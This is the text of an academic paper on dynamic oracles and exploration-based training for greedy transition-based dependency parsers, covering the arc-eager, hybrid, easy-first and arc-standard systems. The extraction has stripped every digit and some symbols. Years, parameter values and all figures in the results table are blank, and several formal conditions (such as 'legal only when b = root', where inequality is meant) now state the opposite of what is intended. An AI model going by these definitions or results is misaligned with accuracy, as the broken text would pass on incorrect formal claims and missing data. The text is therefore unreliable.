train greedy parsers gives substan- tial improvements in accuracy. moreover, this improvement comes at no cost in terms of efficiency, unlike other techniques like beam search. introduction greedy transition-based parsers are easy to imple- ment and are very efficient, but they are generally not as accurate as parsers that are based on global search (mcdonald et al., ; koo and collins, ) or as transition-based parsers that use beam search (zhang and clark, ) or dynamic pro- gramming (huang and sagae, ; kuhlmann et al., ). this work is part of a line of research trying to push the boundaries of greedy parsing and narrow the accuracy gap of – % between search- based and greedy parsers, while maintaining the ef- ficiency and incremental nature of greedy parsers. one reason for the lower accuracy of greedy parsers is error propagation: once the parser makes an error in decoding, more errors are likely to fol- low. this behavior is closely related to the way in which greedy parsers are normally trained. given a treebank oracle, a gold sequence of transitions is derived, and a predictor is trained to predict transi- tions along this gold sequence, without considering any parser state outside this sequence. thus, once the parser strays from the golden path at test time, it ventures into unknown territory and is forced to react to situations it has never been trained for. in recent work (goldberg and nivre, ), we introduced the concept of a dynamic oracle, which is non-deterministic and not restricted to a single golden path, but instead provides optimal predic- tions for any possible state the parser might be in. dynamic oracles are non-deterministic in the sense that they return a set of valid transitions for a given parser state and gold tree. moreover, they are well- defined and optimal also for states from which the gold tree cannot be derived, in the sense that they return the set of transitions leading to the best tree derivable from each state. we showed experimen- tally that, using a dynamic oracle for the arc-eager transition system (nivre, ), a greedy parser can be trained to perform well also after incurring a mis- take, thus alleviating the effect of error propagation and resulting in consistently better parsing accuracy. transactions of the association for computational linguistics, ( ) – . action editor: jason eisner. submitted / ; published / . c© association for computational linguistics. in this paper, we extend the work of goldberg and nivre ( ) by giving a general characteri- zation of dynamic oracles as oracles that are non- deterministic, in that they return sets of transitions, and complete, in that they are defined for all possible states. we then define a formal property of transition systems which we call arc decomposition, and in- troduce a framework for deriving dynamic oracles for arc-decomposable systems. using this frame- work, we derive novel dynamic oracles for the hy- brid (kuhlmann et al., ) and easy-first (gold- berg and elhadad, ) transition systems, which are arc-decomposable (as is the arc-eager system). we also show that the popular arc-standard system (nivre, ) is not arc-decomposable, and so deriv- ing a dynamic oracle for it remains an open research question. finally, we perform a set of experiments on the conll data sets, validating that the use of dynamic oracles for exploring states that result from parsing mistakes during training is beneficial across transition systems. transition-based dependency parsing we begin with a quick review of transition-based dependency parsing, presenting the arc-eager, arc- standard, hybrid and easy-first transitions systems in a common notation. the transition-based pars- ing framework (nivre, ) assumes a transition system, an abstract machine that processes sentences and produces parse trees. the transition system has a set of configurations and a set of transitions which are applied to configurations. when parsing a sen- tence, the system is initialized to an initial configu- ration based on the input sentence, and transitions are repeatedly applied to this configuration. after a finite number of transitions, the system arrives at a terminal configuration, and a parse tree is read off the terminal configuration. in a greedy parser, a clas- sifier is used to choose the transition to take in each configuration, based on features extracted from the configuration itself. transition systems differ by the way they define configurations, and by the particular set of transitions available. . dependency trees we define a dependency tree for a sentence w = w , . . . ,wn to be a labeled directed tree t = (v,a), where v = {w , . . . ,wn} is a set of nodes given by the tokens of the input sentence, and a ⊆ v ×l×v (for some dependency label set l) is a set of labeled directed arcs of the form (h,lb,d), where h ∈ v is said to be the head, d ∈ v the dependent, and lb ∈ l the dependency label. when dealing with unlabeled parsing, or when the label identity is irrelevant, we take a ⊆ v × v to be a set of ordinary directed arcs of the form (h,d). note that, since the nodes of the tree are given by the input sentence, a dependency tree t = (v,a) for a sentence w is uniquely defined by the arc set a. for convenience, we will therefore equate the tree with the arc set and and use the symbol t for the latter, reserving the symbol a for arc sets that are not necessarily trees. in the context of this work it is assumed that all the dependency trees are projective. although the general definition of a dependency tree does not make any assumptions about which node is the root of the tree, it is common practice in dependency parsing to add a dummy node root, which is prefixed or suffixed to the sentence and which always acts as the root of the tree. we will follow this practice in our description of different transition systems below. . transition systems arc-eager in the arc-eager system (nivre, ), a configuration c = (σ,β,a) consists of a stack σ, a buffer β, and a set a of dependency arcs. given a sentence w = w , . . . ,wn, the system is initialized with an empty stack, an empty arc set, and β = w , . . . ,wn, root, where root is the special root node. any configuration c with an empty stack and a buffer containing only root is terminal, and the parse tree is given by the arc set ac of c. the system has transitions: rightlb, leftlb, shift, reduce, defined as follows: shift[(σ, b|β, a)] = (σ|b, β, a) rightlb[(σ|s, b|β, a)] = (σ|s|b, β, a∪{(s,lb,b)}) leftlb[(σ|s, b|β, a)] = (σ, b|β, a∪{(b, lb,s)}) reduce[(σ|s, β, a)] = (σ, β, a) we use σ|x to denote a stack with top element x and re- mainder σ, and x|β to denote a buffer with a head x followed by the elements in β. this definition of a terminal configuration differs from that in nivre ( ) but guarantees that the set ac is a dependency tree rooted in root. there is a precondition on the right and shift transitions to be legal only when b = root, and for left, right and reduce to be legal only when the stack is non-empty. moreover, left is only le- gal when s does not have a parent in a, and reduce when s does have a parent in a. in general, we use legal(c) to refer to the set of transitions that are le- gal in a configuration c. the arc-eager system builds trees eagerly in the sense that arcs are added at the earliest time possible. in addition, each word will collect all of its left dependents before collecting its right dependents. arc-standard the arc-standard system (nivre, ) has configurations of the same form c = (σ,β,a) as the arc-eager system. the initial con- figuration for a sentence w = w , . . . ,wn has an empty stack and arc set and β = root,w , . . . ,wn. a configuration c is terminal if it has an empty buffer and a stack containing the single node root; the parse tree is given by ac. the system has transi- tions: rightlb, leftlb, shift, defined as follows: shift[(σ, b|β, a)] = (σ|b, β, a) rightlb[(σ|s |s , β, a)] = (σ|s , β, a∪{(s , lb,s )}) leftlb[(σ|s |s , β, a)] = (σ|s , β, a∪{(s , lb,s )}) there is a precondition on the left transition to be legal only when s = root, and for left and right to be legal only when the stack has at least two elements. the arc-standard system builds trees in a bottom-up fashion: each word must collect all its dependents before being attached to its head. the system does not pose any restriction with regard to the order of collecting left and right dependents. hybrid the hybrid system (kuhlmann et al., ) has the same configurations and the same initialization and termination conditions as the arc- standard system. the system has transitions: rightlb, leftlb, shift, defined as follows: shift[(σ, b|β, a)] = (σ|b, β, a) rightlb[(σ|s |s , β, a)] = (σ|s , β, a∪{(s , lb,s )}) leftlb[(σ|s, b|β, a)] = (σ, b|β, a∪{(b, lb,s)}) there is a precondition on right to be legal only when the stack has at least two elements, and on left to be legal only when the stack is non-empty and s = root. the hybrid system can be seen as a combination of the arc-standard and arc-eager algorithm greedy transition-based parsing : input: sentence w , parameter-vector w : c ← initial(w) : while not terminal(c) do : tp ← arg maxt∈legal(c) w ·φ(c,t) : c ← tp(c) : return ac systems, using the left action of arc-eager and the right action of arc-standard. like arc-standard, it builds trees in a bottom-up fashion. but like arc- eager, it requires a word to collect all its left depen- dents before collecting any right dependent. easy-first in the easy-first system (goldberg and elhadad, ), a configuration c = (λ,a) consists of a list λ and a set a of dependency arcs. we use li to denote the ith member of λ and write |λ| for the length of λ. given a sentence w = w , . . . ,wn, the system is initialized with an empty arc set and λ = root,w , . . . ,wn. a configuration c is ter- minal with parse tree ac if λ = root. the set of transitions for a given configuration c = (λ,a) is: {leftilb| < i ≤ |λ|}∪{rightilb| ≤ i < |λ|}, where: leftilb[(λ,a)] = (λ\{li− }, a∪{(li, lb, li− )}) rightilb[(λ,a)] = (λ\{li+ }, a∪{(li, lb, li+ )}) there is a precondition on lefti transitions to only trigger if li− = root. unlike the arc-eager, arc- standard and hybrid transition systems that work in a left-to-right order and access the sentence in- crementally, the easy-first system is non-directional and has access to the entire sentence at each step. like the arc-standard and hybrid systems, it builds trees bottom-up. . greedy transition-based parsing assuming that we have a feature-extraction function φ(c,t) over configurations c and transitions t and a weight-vector w assigning weights to each feature, greedy transition-based parsing is very simple and efficient using algorithm . starting in the initial configuration for a given sentence, we repeatedly choose the highest-scoring transition according to our model and apply it, until we reach a terminal configuration, at which point we stop and return the parse tree accumulated in the configuration. algorithm online training of greedy transition- based parsers (ith iteration) : for sentence w with gold tree t in corpus do : c ← initial(w) : while not terminal(c) do : correct(c) ←{t |o(t;c,t) = true} : tp ← arg maxt∈legal(c) w ·φ(c,t) : to ← arg maxt∈correct(c) w ·φ(c,t) : if tp ∈ correct(c) then : update(w,φ(c,to),φ(c,tp)) : c ← next(c,to) : else : c ← tp(c) training transition-based parsers we now turn to the training of greedy transition- based parsers, starting with a review of the standard method using static oracles and moving on to the idea of training with exploration proposed by gold- berg and nivre ( ). . training with static oracles the standard approach to training greedy transition- based parsers is illustrated in algorithm . it as- sumes the existence of an oracle o(t;c,t), which returns true if transition t is correct for configura- tion c and gold tree t . given this oracle, training is very similar to parsing, but after predicting the next transition tp using the model in line we check if it is contained in the set correct(c) of transitions that are considered correct by the oracle (lines and ). if the predicted transition tp is not correct, we update the model parameters w away from tp and toward the oracle prediction to, which is the highest- scoring correct transition under the current model, and move on to the next configuration (lines – ). if tp is correct, we simply apply it and move to tp(c) without changing the model parameters (line ). the function next(c,to) in line is used to abstract over a subtle difference in the standard training procedure for the left-to-right systems (arc- eager, arc-standard and hybrid), on the one hand, we present the standard approach as an online algorithm in order to ease the transition to the novel approach. while some transition-based parsers use batch learning instead, the essential point is that they explore exactly the same configurations during the training phase. and the easy-first system, on the other. in the former case, next(c,to) evaluates to to(c), which means that we apply the oracle transition to and move on to the next configuration. for the easy-first system, next(c,to) instead evaluates to c, which means that we remain in the same configuration for as many up- dates as necessary to get a correct model prediction. traditionally, the oracles for the left-to-right sys- tems are static: they return a single correct transition and are only correct for configurations that result from transitions predicted by the oracle itself. the oracle for the easy-first system is non-deterministic and returns a set of correct transitions. however, like the static oracle, it is correct only for configurations from which the gold tree is reachable. thus, in both cases, we need to make sure that a transition is ap- plied during training only if it is considered correct by the oracle; else we cannot guarantee that later or- acle predictions will be correct. therefore, on line , we either remain in the same configuration (easy- first) or follow the oracle prediction and go to to(c) (left-to-right systems); on line , we in fact also go to to(c), because in this case we have tp(c) = to(c). a notable shortcoming of this training procedure is that, at parsing time, the parsing model may pre- dict incorrect transitions and reach configurations that are not on the oracle path. since the model has never seen such configurations during training, it is likely to perform badly in them, making further mis- takes more likely. we would therefore like the parser to encounter configurations resulting from incorrect transitions during training and learn what constitutes optimal transitions in such configurations. unfortu- nately, this is not possible using the static (or even the non-deterministic) oracles. . training with exploration assuming we had access to an oracle that could tell us which transitions are optimal in any configura- tion, including ones from which the gold tree is not reachable, we could trivially change the training al- gorithm to incorporate learning on configurations that result from incorrect transitions, and thereby mitigate the effects of error propagation at pars- ing time. conceptually, all that we need to change is line . instead of following the prediction tp only when it is correct (line ), we could some- times choose to follow tp also when it is not correct. algorithm online training with exploration for greedy transition-based parsers (ith iteration) : for sentence w with gold tree t in corpus do : c ← initial(w) : while not terminal(c) do : correct(c) ←{t|o(t;c,t) = true} : tp ← arg maxt∈legal(c) w ·φ(c,t) : to ← arg maxt∈correct(c) w ·φ(c,t) : if tp ∈ correct(c) then : update(w,φ(c,to),φ(c,tp)) : c ← explorek,p(c,to, tp, i) : else : c ← tp(c) : function explorek,p(c, to, tp, i) : if i > k and rand() < p then : return tp(c) : else : return next(c,to) the rest of the training algorithm does not need to change, as the set correct(c) obtained in line would now include the set of optimal transitions to take from configurations reached by following the incorrect transition, as provided by the new oracle. following goldberg and nivre ( ), we call this approach learning with exploration. the modified training procedure is specified in algorithm . there are three major questions that need to be answered when implementing a concrete version of this algorithm: exploration policy when do we follow an incor- rect transition, and which one do we follow? optimality what constitutes an optimal transition in configurations from which the gold tree is not reachable? oracle given a definition of optimality, how do we calculate the set of optimal transitions in a given configuration? the first two questions are independent of the spe- cific transition system. in our experiments, we use a simple exploration policy, parameterized by an it- eration number k and a probability p. this policy always chooses an oracle transition during the first k iterations but later chooses the oracle transition with probability −p and the (possibly incorrect) model prediction otherwise. this is defined in the function explorek,p(c,to, tp, i) (called in line of algo- rithm ), which takes two additional arguments com- pared to algorithm : the model prediction tp and the current training iteration i. if i exceeds the iter- ation threshold k and if a randomly generated prob- ability does not exceed the probability threshold p, then the function returns tp(c), which means that we follow the (incorrect) model prediction. otherwise, it reverts to the old next(c,to) function, returning c for easy-first and to(c) for the other systems. we show in section that the training procedure is rel- atively insensitive to the choice of k and p values as long as predicted transitions are chosen often. our optimality criterion is directly related to the attachment score metrics commonly used to evaluate dependency parsers. we say that a transition t is optimal in a configuration c if and only if the best achievable attachment score from t(c) is equal to the best achievable attachment score from c. the implementation of oracles is specific to each transition system. in the next section, we first provide a characterization of complete non- deterministic oracles, also called dynamic oracles, which is what we require for the training procedure in algorithm . we then define a property of tran- sition systems which we call arc decomposition and present a general method for deriving complete non- deterministic oracles for arc-decomposable systems. finally, we use this method to derive concrete ora- cles for the arc-eager, hybrid and easy-first systems, which are all arc-decomposable. in section , we then show experimentally that we indeed achieve better parsing accuracy when using exploration dur- ing training. oracles for transition-based parsing almost all greedy transition-based parsers described in the literature are trained using what we call static oracles. we now make this notion precise and con- trast it with non-deterministic and complete oracles. following the terminology of goldberg and nivre the labeled attachment score (las) is the percentage of words in a sentence that are assigned both the correct head and the correct label. the unlabeled attachment score (uas) is the percentage of words that are assigned the correct head (regard- less of label). ( ), we reserve the term dynamic oracles for or- acles that are both non-deterministic and complete. . characterizing oracles during training, we assume that the oracle is a boolean function o(t;c,t), which returns true if and only if transition t is correct in configuration c for gold tree t (cf. algorithms – ). however, such a function may be defined in terms of different un- derlying functions that we also call oracles. a static oracle is a function os(t) mapping a tree t to a sequence of transitions t , . . . , tn. a static oracle is correct if starting in the initial con- figuration and applying the transitions in os(t) in order results in the transition system reaching a terminating configuration with parse tree t . for- mally, a static oracle is correct if and only if, for every projective dependency tree t with yield w , os(t) = t , . . . , tn, c = tn(. . .(t (initial(w)))), terminal(c) and ac = t . when using a static oracle for training in algorithm , the function o(t;c,t) returns true if os(t) = t , . . . , tn, c = ti− (. . .(t (initial(w)))) (for some i, ≤ i ≤ n) and t = ti. if t = ti, o(t;c,t) = false; if c = ti− (. . .(t (initial(w)))) (for all i, ≤ i ≤ n), o(t;c,t) is undefined. a static oracle is therefore essentially incomplete, because it is only defined for configurations that are part of the oracle path. static oracles either allow a single transition at a given con- figuration, or are undefined for that configuration. by contrast, a non-deterministic oracle is a func- tion on(c,t) mapping a configuration c and a tree t to a set of transitions. a non-deterministic ora- cle is correct if and only if, for every projective de- pendency tree t , every configuration c from which t is reachable, and every transition t ∈ on(c,t), t(c) is a configuration from which t is still reach- able. note that this definition of correctness for non-deterministic oracles is restricted to configura- tions from which a goal tree is reachable. non- since all the transition systems considered in this paper are restricted to projective dependency trees, we only define cor- rectness with respect to this class. there are obvious general- izations that apply to more expressive transition systems. static oracles are usually described as rules over parser configurations, i.e., “if the configuration is x take transition y”, giving the impressions they are functions from configurations to transitions. however, as explained here, these rules are only correct if the sequence of transitions is followed in its entirety. deterministic oracles are more flexible than static oracles in that they allow for spurious ambiguity: they support the possibility of different sequences of transitions leading to the gold tree. however, they are still only guaranteed to be correct on a subset of the possible configurations. thus, when using a non-deterministic oracle for training in algorithm , the function o(t;c,t) returns true if t is reachable from c and t ∈ on(c,t). however, if t is not reachable from c, o(t;c,t) is not necessarily well- defined. a complete non-deterministic oracle is a function od(c,t) for which this restriction is removed, so that correctness is defined over all configurations that are reachable from the initial configuration. follow- ing goldberg and nivre ( ), we call complete non-deterministic oracles dynamic. in order to de- fine correctness for dynamic oracles, we must first introduce a cost function c(a,t), which measures the cost of outputting parse a when the gold tree is t . in this paper, we define cost as hamming loss (for labeled or unlabeled dependency arcs), which is directly related to the attachment score metrics used to evaluate dependency parsers, but other cost functions are conceivable. we say that a complete non-deterministic oracle is correct if and only if, for every projective dependency tree t with yield w , every configuration c that is reachable from initial(w), and every transition t ∈ od(c,t), mina:c;a c(a,t) = mina:t(c);a c(a,t), where c ; a signifies that the parse a is reachable from c, a notion that will be formally defined in the next subsection. in other words, even if the gold tree t is no longer reachable itself, the best tree reachable from t(c) has the same cost as the best tree reachable from c. in addition to a cost function for arc sets and trees, it is convenient to define a cost function for transi- tions. we define c(t;c,t) to be the difference in cost between the best tree reachable from t(c) and c, respectively. that is: c(t;c,t) = min a:t(c);a c(a,t)− min a:c;a c(a,t) a dynamic oracle can then be defined as an oracle that returns the set of transitions with zero cost: od(c,t) = {t | c(t;c,t) = } . arc reachability and arc decomposition we now define the notion of reachability for parses (or arc sets), used already in the previous subsec- tion, and relate it to reachability for individual de- pendency arcs. this enables us to define a prop- erty of transition systems called arc decomposition, which is very useful when deriving dynamic oracles. arc reachability we say that a dependency arc (h,d) is reachable from a configuration c, writ- ten c ; (h,d), if there is a (possibly empty) se- quence of transitions t , . . . , tk such that (h,d) ∈ a(tk(...t (c))). in words, we require a sequence of transitions starting from c and leading to a configu- ration whose arc set contains (h,d). arc set reachability a set of dependency arcs a = {(h ,d ), . . . ,(hn,dn)} is reachable from a configuration c, written c ; a, if there is a (pos- sibly empty) sequence of transitions t , . . . , tk such that a ⊆ a(tk(...t (c))). in words, there is a sequence of transitions starting from c and leading to a config- uration where all arcs in a have been derived. tree consistency a set of arcs a is said to be tree consistent if there exists a projective dependency tree t such that a ⊆ t . arc decomposition a transition system is said to be arc decomposable if, for every tree consistent arc set a and configuration c, c ; a is entailed by c ; (h,d) for every arc (h,d) ∈ a. in words, if every arc in a tree consistent arc set is reachable from a configuration, then the entire arc set is also reachable from that configuration. arc decomposition is a powerful property, allowing us to reduce reasoning about the reachability of arc sets or trees to reasoning about the reachability of individual arcs, and will later use this property to derive dynamic oracles for the arc-eager, hybrid and easy-first systems. we consider unlabeled arcs here in order to keep notation simple. everything is trivially extendable to the labeled case. . proving arc decomposition let us now sketch how arc decomposition can be proven for the transition systems in consideration. arc-eager for the arc-eager system, consider an arbitrary configuration c = (σ,β,a) and a tree- consistent arc set a′ such that all arcs are reachable from c. we can partition a′ into four sets, each of which is by necessity itself a tree-consistent arc-set: ( ) b = {(h,d) |h,d ∈ β} ( ) b = {(h,d) |h,d ∈ β} ( ) bh = {(h,d) |h ∈ β,d ∈ σ} ( ) bd = {(h,d) |d ∈ β,h ∈ σ} arcs in b are already in a and cannot interfere with other arcs. b is reachable by any sequence of transi- tions that derives a tree consistent with b for a sen- tence containing only the words in β. in deriving this tree, every node x involved in some arc in bh or bd must at least once be at the head of the buffer. let cx be the first such configuaration. from cx, every arc (x,d) ∈ bh can be derived without in- terfering with arcs in a′ by a sequence of reduce and left-arclb transitions. this sequence of tran- sitions will trivially not interfere with other arcs in bh. moreover, it will not interfere with arcs in bd because a′ is tree consistent and projectivity ensures that an arc of the form (y,z) (y ∈ σ,z ∈ β) must satisfy y < d < x ≤ z. finally, it will not inter- fere with arcs in b because the buffer remains un- changed. after deriving every arc (x,d) ∈ bh, we remain with at most one (h,x) ∈ bd (because of the single-head constraint). by the same reasoning as above, a sequence of reduce and left-arclb transitions will take us to a configuration where h is on top of the stack without interfering with arcs in a′. we can then derive the arc (h,x) using right-arclb. this does not interfere with arcs re- maining in bh or bd because all such arcs must have their buffer node further down the buffer (due to pro- jectivity). at this point, we have reached a configu- ration cx+ to which the same reasoning applies for the next node x + . hybrid the proof for the hybrid system is very similar but with a slightly different partitioning be- cause of the bottom-up order and the different way of handling right-arcs. easy-first for the easy-first system, we only need to partition arcs into l = {(h,d) |d ∈ λ} and l = {(h,d) |h,d ∈ λ}. the former must already be in a, and for the latter there can be no conflict between arcs as long as we respect the bottom-up ordering. arc-standard unfortunately, arc decomposition does not hold for the arc-standard system. to see why, consider a configuration with the stack σ = a,b,c. the arc (c,b) is reachable via left, the arc (b,a) is reachable via right, left, the arc set a = {(c,b),(b,a)} forms a projective tree and is thus tree consistent, but it is easy to convince oneself that a is not reachable from this configuration. the reason that the above proof technique fails for the arc-standard system is that the arc set correspond- ing to b in the arc-eager system may involve arcs where both nodes are still on the stack, and we can- not guarantee that all projective trees consistent with these arcs can be derived. in the very similar hybrid system, such arcs exist as well but they are limited to arcs of the form (h,d) where h < d and h and d are adjacent on the stack, and this restriction is sufficient to restore arc decomposition. . deriving oracles we now present a procedure for deriving a dynamic oracle for any arc-decomposable system. first of all, we can define a non-deterministic oracle as follows: on(c,t) = {t | t(c) ; t} that is, we allow all transitions after which the goal tree is still reachable. note that if c ; t holds, then the set returned by the oracle is guaranteed to be non-empty. for a sound and complete transition system, we know that initial(w) ; t for any projective dependency tree with yield w , and the or- acle is guaranteed to return a non-empty set as long as we are not in the terminal configuration and have followed transitions suggested by the oracle. in order to extend the non-deterministic oracle to a dynamic oracle, we make use of the transition cost function introduced earlier: od(c,t) = {t | c(t;c,t) = } as already mentioned, we assume here that the cost is the difference in hamming loss between the best tree reachable before and after the transition. as- suming arc decomposition, this is equivalent to the number of gold arcs that are reachable before but not after the transition. for configurations from which t is reachable, the dynamic oracle coincides with the non-deterministic oracle. but for configurations from which t cannot be derived, the dynamic ora- cle returns transitions leading to the best parse a (in terms of hamming distance from t ) which is reach- able from c. this is the behavior expected from a dynamic oracle, as defined in section . . thus, in order to derive a dynamic oracle for an arc-decomposable transition system, it is sufficient to show that the transition cost function c(t;c,t) can be computed efficiently for that system. next we show how to do this for the arc-eager, hybrid and easy-first systems. . concrete oracles in a given transition system, the set of individually reachable arcs is relatively straightforward to com- pute. in an arc-decomposable system, we know that any intersection of the set of individually reachable arcs with a projective tree is tree consistent, and therefore also reachable. in particular, this holds for the goal tree. for such systems, we can therefore compute the transition cost by intersecting the set of arcs that are individually reachable from a config- uration with the goal arc set, and see how a given transition affects this set of reachable arcs. arc-eager in the arc-eager system, an arc (h,d) is reachable from a configuration c if one of the following conditions hold: ( ) (h,d) is already derived ((h,d) ∈ ac); ( ) h and d are in the buffer; ( ) h is on the stack and d is in the buffer; ( ) d is on the stack and is not assigned a head and h is in the buffer. the framework is easily adapted to a different cost function such as weighted hamming cost, where different gold arcs are weighted differently. in fact, in order to use the dynamic oracle with our current learning algorithm, we do not need the full power of the cost function: it is sufficient to distinguish between transitions with zero cost and transitions with non-zero cost. the cost function for a configuration of the form c = (σ|s,b|β,a) can be calculated as follows: • c(left;c,t): adding the arc (b,s) and pop- ping s from the stack means that s will not be able to acquire any head or dependents in β. the cost is therefore the number of arcs in t of the form (k,s) or (s,k) such that k ∈ β. note that the cost is for the trivial case where (b,s) ∈ t , but also for the case where b is not the gold head of s but the real head is not in β (due to an erroneous previous transition) and there are no gold dependents of s in β. • c(right;c,t): adding the arc (s,b) and pushing b onto the stack means that b will not be able to acquire any head in σ or β, nor any dependents in σ. the cost is therefore the num- ber of arcs in t of the form (k,b), such that k ∈ σ ∪ β, or of the form (b,k) such that k ∈ σ and there is no arc (x,k) in ac. note again that the cost is for the trivial case where (s,b) ∈ t , but also for the case where s is not the gold head of b but the real head is not in σ or β (due to an erroneous previous transition) and there are no gold dependents of b in σ. • c(reduce;c,t): popping s from the stack means that s will not be able to acquire any de- pendents in b = b|β. the cost is therefore the number of arcs in t of the form (s,k) such that k ∈ b. while it may seem that a gold arc of the form (k,s) should be accounted for as well, note that a gold arc of that form, if it exists, is already accounted for by a previous (erroneous) right transition when s acquired its head. • c(shift;c,t): pushing b onto the stack means that b will not be able to acquire any head or dependents in s = s|σ. the cost is therefore the number of arcs in t of the form (k,b) or (b,k) such that k ∈ s and (for the second case) there is no arc (x,k) in ac. this is a slight abuse of notation, since for the shift tran- sition s may not exist, and for the reduce transition b may not exist. while very similar to the presentation in goldberg and nivre ( ), this version includes a small correction to the right and shift transitions. hybrid in the hybrid system, an arc (h,d) is reachable from a configuration c if one of the fol- lowing conditions holds: ( ) (h,d) is already derived ((h,d) ∈ ac); ( ) h and d are in the buffer; ( ) h is on the stack and d is in the buffer; ( ) d is on the stack and h is in the buffer; ( ) d is in stack location i, h is in stack loca- tion i − (that is, the stack has the form σ = . . . ,h,d, . . .). the cost function for a configuration of the form c = (σ|s |s ,b|β,a) can be calculated as follows: • c(left;c,t): adding the arc (b,s ) and pop- ping s from the stack means that s will not be able to acquire heads from h = {s }∪ β and will not be able to acquire dependents from d = {b}∪β. the cost is therefore the number of arcs in t of the form (s ,d) and (h,s ) for h ∈ h and d ∈ d. • c(right;c,t): adding the arc (s ,s ) and popping s from the stack means that s will not be able to acquire heads or dependents from b = {b}∪β. the cost is therefore the number of arcs in t of the form (s ,d) and (h,s ) for h,d ∈ b. • c(shift;c,t): pushing b onto the stack means that b will not be able to acquire heads from h = {s }∪σ, and will not be able to acquire dependents from d = {s ,s }∪ σ. the cost is therefore the number of arcs in t of the form (b,d) and (h,b) for h ∈ h and d ∈ d. easy-first in the easy-first system, an arc (h,d) is reachable from a configuration c if one of the fol- lowing conditions holds: ( ) (h,d) is already derived ((h,d) ∈ ac); ( ) h and d are in the list λ. when adding an arc (h,d), d is removed from the list λ and cannot participate in any future arcs. thus, a transition has a cost > with respect to a tree t if one of the following holds: note again that s may be missing in the case of shift case and s in the case of shift and left. . . . arabic . . . . . basque . . . . . catalan . . . . . chinese . . . . . czech . . . . . english . . . . . greek . . . . . hungarian . . . . . italian . . . . . turkish . . figure : effect of k (y axis) and p (x axis) values on parsing accuracies for the arc-eager system on the various conll- shared-task languages. each point is an average uas of runs with different seeds. the general trend is that smaller k and higher p are better. ( ) it adds an arc (h,d) such that (h′,d) ∈ t for some h′ ∈ λ, h′ = h; ( ) it adds an arc (h,d) such that (d,d′) ∈ t for some d′ ∈ λ. the exact cost can be calculated by counting the number of such arcs. experiments and results setup, data and parameters the goal of our ex- periments is to evaluate the utility of the dynamic oracles for training, by comparing a training sce- nario which only sees configurations that can lead to the gold tree (following a static oracle for the left-to-right systems and a non-deterministic but in- complete oracle for the easy-first system), against a training scenario that involves exploration of incor- rect states, using the dynamic oracles. as our training algorithm involves a random com- ponent (we shuffle the sentences prior to each itera- tion, and randomly select whether to follow a cor- rect or incorrect action), we evaluate each setup five times using different random seeds, and report the averaged results. we perform all of the experiments on the multi- lingual conll- data sets. we use training iterations for the left-to-right parsers, and training iterations for the easy-first parser. we use the stan- dard perceptron update as our update rule in training, and use the averaged weight vector for prediction in test time. the feature sets differ by transition sys- tem but are kept the same across data sets. the ex- act feature-set definitions for the different systems are available in the accompanying software, which is available on line at the first author’s homepage. effect of exploration parameters in an initial set of experiments, we investigate the effect of the ex- ploration parameters k and p on the arc-eager sys- tem. the results are presented in figure . while the optimal parameters vary by data set, there is a clear trend toward lower values of k and higher values of p. this is consistent with the report of goldberg and nivre ( ) who used a fixed small value of k and large value of p throughout their experiments. training with exploration for the various systems for the second experiment, in which we compared training with a static oracle to training with explo- ration, we fixed the exploration parameters to k = and p = . for all data sets and transition-system combinations. the results in terms of labeled accu- racies (for the left-to-right systems) and unlabeled accuracies (for all systems) are presented in table . training with exploration using the dynamic oracles yields improved accuracy for the vast majority of the setups. the notable exceptions are the arc-eager and easy-first systems for unlabeled italian and the arc- hybrid system in catalan, where we observe a small drop in accuracy. however, we can safely conclude that training with exploration is beneficial and note that we may get even further gains in the future using better methods for tuning the exploration parameters or better training methods. system / language hungarian chinese greek czech basque catalan english turkish arabic italian uas eager:static . . . . . . . . . . eager:dynamic . . . . . . . . . . hybrid:static . . . . . . . . . . hybrid:dynamic . . . . . . . . . . easyfirst:static . . . . . . . . . . easyfirst:dynamic . . . . . . . . . . las eager:static . . . . . . . . . . eager:dynamic . . . . . . . . . . hybrid:static . . . . . . . . . . hybrid:dynamic . . . . . . . . . . table : results on the conll data set. uas, including punctuation. each number is an average over runs with different randomization seeds. all experiments used the same exploration parameters of k= , p= . . related work the error propagation problem for greedy transition- based parsing was diagnosed by mcdonald and nivre ( ) and has been tackled with a variety of techniques including parser stacking (nivre and mc- donald, ; martins et al., ) and beam search and structured prediction (zhang and clark, ; zhang and nivre, ). the technique called boot- strapping in choi and palmer ( ) is similar in spirit to training with exploration but is applied iter- atively in batch mode and is only approximate due to the use of static oracles. dynamic oracles were first explored by goldberg and nivre ( ). in machine learning more generally, our approach can be seen as a problem-specific instance of imita- tion learning (abbeel and ng, ; vlachos, ; he et al., ; daumé iii et al., ; ross et al., ), where the dynamic oracle is used to im- plement the optimal expert needed in the imitation learning setup. indeed, our training procedure is closely related to dagger (ross et al., ), which also trains a classifier to match an expert on a dis- tribution of possibly suboptimal states obtained by running the system itself. our training procedure can be viewed as an online version of dagger (he et al., ) with two extensions: first, our learn- ing algorithm involves a stochastic policy parame- terized by k, p for choosing between the oracle or the model prediction, whereas dagger always fol- lows the system’s own prediction (essentially run- ning with k = , p = ). the heatmaps in figure show that this parameterization is beneficial. sec- ond, while dagger assumes an expert providing a single label at each state, our oracle is nondetermin- istic and allows multiple correct labels (transitions) which our training procedure tie-breaks according to the model’s current prediction, a technique that has recently been proposed in an extension to dagger by he et al. ( ). other related approaches in the machine learning literature include stacked sequen- tial learning (cohen and carvalho, ), laso (daumé iii and marcu, ), searn (daumé iii et al., ) and smile (ross and bagnell, ). conclusion in this paper, we have extended the work on dynamic oracles presented in goldberg and nivre ( ) in several directions by giving formal characterizations of non-deterministic and complete oracles, defining the arc-decomposition property for transition sys- tems, and using this property to derive novel com- plete non-deterministic oracles for the hybrid and easy-first systems (as well as a corrected oracle for the arc-eager system). we have then used the com- pleteness of these new oracles to improve the train- ing procedure of greedy parsers to include explo- rations of configurations which result from incor- rect transitions. for all three transition systems, we get substantial accuracy improvements on many lan- guages. as the changes all take place at training time, the very fast running time of the greedy algo- rithm at test time is maintained. references pieter abbeel and andrew y ng. . apprenticeship learning via inverse reinforcement learning. in pro- ceedings of the st international conference on ma- chine learning (icml), page . jinho d. choi and martha palmer. . getting the most out of transition-based dependency parsing. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – . william w. cohen and vitor r. carvalho. . stacked sequential learning. in proceedings of the inter- national joint conference on artificial intelligence, pages – . hal daumé iii and daniel marcu. . learning as search optimization: approximate large margin meth- ods for structured prediction. in proceedings of the nd international conference on machine learning, pages – . hal daumé iii, john langford, and daniel marcu. . search-based structured prediction. machine learn- ing, : – . yoav goldberg and michael elhadad. . an effi- cient algorithm for easy-first non-directional depen- dency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational 